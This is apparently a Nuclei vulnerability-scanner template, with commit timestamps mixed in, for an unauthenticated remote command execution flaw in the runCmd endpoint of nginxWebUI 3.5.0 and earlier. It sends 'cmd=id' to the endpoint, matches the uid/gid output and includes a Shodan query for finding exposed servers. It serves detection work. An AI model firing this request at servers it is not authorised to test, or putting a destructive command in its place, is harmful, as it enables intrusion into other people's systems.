2023-07-27 11:25:44 +00:00
id : nginxwebui-runcmd-rce
info :
name : nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution
author : DhiyaneshDk
severity : critical
description : |
nginxWebUI’ s runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization.
reference :
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/nginxWebUI_runCmd_rce.go
- https://www.ctfiot.com/124166.html
- https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-07-27 11:25:44 +00:00
max-request : 1
shodan-query : html:"nginxWebUI"
tags : nginx,nginxwebui,rce
http :
- method : GET
path :
- "{{BaseURL}}/AdminPage/conf/runCmd?cmd=id"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type : word
part : header
words :
- "application/json"
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a0047304502210081a7d1be91afd5d5a275640656fa90a4090a9db4e07dfa4f98d79af3ffcd4643022074399e6cc676e190f1f70f40319954362f93dad5a731f1fef86fe2fe3d168f1f:922c64590222798bb761d5b6d8e72950